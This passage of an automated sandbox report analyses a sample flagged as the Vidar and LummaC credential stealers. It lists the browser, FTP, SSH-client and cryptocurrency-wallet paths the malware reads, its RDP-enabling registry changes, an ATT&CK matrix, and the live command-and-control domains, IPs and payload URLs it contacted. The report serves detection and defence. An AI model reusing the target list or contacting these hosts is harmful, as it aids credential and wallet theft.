Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5640, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.file.exe.41f5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.41f5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5640, type: MEMORYSTR

Allows multiple concurrent remote connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessions

Enables remote desktop connection

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnections

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB00C40 sqlite3_bind_zeroblob,	6_2_6CB00C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB00D60 sqlite3_bind_parameter_name,	6_2_6CB00D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA28EA0 sqlite3_clear_bindings,	6_2_6CA28EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CB00B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	6_2_6CB00B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA26410 bind,WSAGetLastError,	6_2_6CA26410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA260B0 listen,WSAGetLastError,	6_2_6CA260B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA2C030 sqlite3_bind_parameter_count,	6_2_6CA2C030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA26070 PR_Listen,	6_2_6CA26070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA2C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	6_2_6CA2C050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6C9B22D0 sqlite3_bind_blob,	6_2_6C9B22D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA263C0 PR_Bind,	6_2_6CA263C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	21 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	2 Remote Desktop Protocol	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Create Account	2 Windows Service	41 Obfuscated Files or Information	Security Account Manager	5 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Windows Service	511 Process Injection	12 Software Packing	NTDS	57 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	251 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	23 Masquerading	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	511 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	45%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\CFHIIEHJKK.exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe	100%	Avira	HEUR/AGEN.1311769
C:\ProgramData\CFHIIEHJKK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	100%	Joe Sandbox ML
C:\Program Files\RDP Wrapper\rdpwrap.dll	54%	ReversingLabs	Win64.PUA.RDPWrapper
C:\ProgramData\BKKFCFBKFC.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\GIEHJDHCBA.exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5db9e54794_vfkagks[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5dbaca34ac_lfdnsafnds[1].exe	43%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	47%	ReversingLabs	Win32.PUA.RDPWrap
C:\Windows\System32\rfxvmt.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
https://www.youtube.com	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
stogeneratmns.shop	100%	Avira URL Cloud	malware
wallkedsleeoi.shop	100%	Avira URL Cloud	malware
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://login.steampowered.com/	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
http://api.ipi4	0%	Avira URL Cloud	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/765611997804188691	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://cowod.hopto.CBAFCF	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/	100%	Avira URL Cloud	malware
https://ghostreedmnu.shop/v	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://api.steampowered.com/	0%	URL Reputation	safe
https://hansgborn.eu/receiL	0%	Avira URL Cloud	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://player.vimeo.com	0%	URL Reputation	safe
https://www.youtube.com/	0%	Avira URL Cloud	safe
fragnantbui.shop	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/	0%	Avira URL Cloud	safe
https://5.75.211.162pData	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
https://5.75.211.162KJEHD	0%	Avira URL Cloud	safe
offensivedzvju.shop	100%	Avira URL Cloud	malware
http://api.ipify86z	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869&nX	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/	100%	Avira URL Cloud	malware
https://5.75.211.16214d953f2846xe	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869/inventory/	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	0%	Avira URL Cloud	safe
https://login.steampowered.c	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	100%	Avira URL Cloud	malware
https://5.75.211.162/freebl3.dlll	100%	Avira URL Cloud	malware
https://5.75.211.162/mozglue.dllf	100%	Avira URL Cloud	malware
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
https://5.75.211.162/softokn3.dll	100%	Avira URL Cloud	malware
http://147.45.44.104	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	100%	Avira URL Cloud	malware
https://5.75.211.162IDGCB	0%	Avira URL Cloud	safe
https://stogeneratmns.shop/api	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	0%	Avira URL Cloud	safe
https://steamcommunity.com/lG	0%	Avira URL Cloud	safe
https://ghostreedmnu.shop/api	100%	Avira URL Cloud	malware
https://reinforcenh.shop/os%P	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
http://127.0.0.1:27060	0%	Avira URL Cloud	safe
http://hansgborn.eu	0%	Avira URL Cloud	safe
https://5.75.211.1620.5938.134	0%	Avira URL Cloud	safe
http://cowod.hopto.orgFCF	0%	Avira URL Cloud	safe
https://5.75.211.162/	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta	0%	Avira URL Cloud	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
http://api.ipify.orgd	0%	Avira URL Cloud	safe
https://5.75.211.162/nss3.dllz	100%	Avira URL Cloud	malware
http://cowod.hopto.org	0%	Avira URL Cloud	safe
https://5.75.211.162/nss3.dlla	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.96.3	true	true	unknown
gutterydhowi.shop	172.67.132.32	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.96.3	true	true	unknown
drawzhotdog.shop	172.67.162.108	true	true	unknown
ghostreedmnu.shop	188.114.96.3	true	true	unknown
ballotnwu.site	172.67.128.144	true	true	unknown
wallkedsleeoi.shop	172.67.194.216	true	true	unknown
hansgborn.eu	188.114.96.3	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
stogeneratmns.shop	188.114.97.3	true	true	unknown
reinforcenh.shop	104.21.77.130	true	true	unknown
api.ipify.org	104.26.12.205	true	false	unknown
vozmeatillu.shop	188.114.96.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
wallkedsleeoi.shop	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop/api	true	Avira URL Cloud: malware	unknown
https://ghostreedmnu.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	EHJDGC.6.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	EHJDGC.6.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	Avira URL Cloud: safe	unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2453119185.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.2456368486.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.6.dr, 76561199780418869[1].htm.19.dr	false	URL Reputation: safe	unknown
https://www.youtube.com	RegAsm.exe, 00000013.00000002.2456368486.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000002.00000002.1334300734.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
